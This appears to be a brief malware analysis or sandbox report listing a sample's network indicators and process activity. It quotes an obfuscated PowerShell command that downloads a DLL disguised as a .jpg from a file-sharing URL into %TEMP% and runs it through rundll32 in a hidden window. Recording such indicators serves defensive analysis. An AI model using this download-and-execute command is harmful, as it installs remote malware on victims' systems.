Technical Information
- https://irons.box.com/shared/static/7bvm7l9xc8y46navlfp1exk6gh8l2ozq.jpg as %temp%\lltpnvfyn_user_kmube.dll
- 'ir###.box.com':443
- DNS ASK ir###.box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-object system.Net.webclieNt).dowNloadfile('""https://irons.box.com/shared/static/7bvm7l9xc8y46navlfp1exk6gh8l2ozq.jpg','%TEMP%\lltpnvfyn_user_kmube.dll');start-Process ruNdll32.exe %TEMP%\...' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\lltpnvfyn_user_kmube.dll starter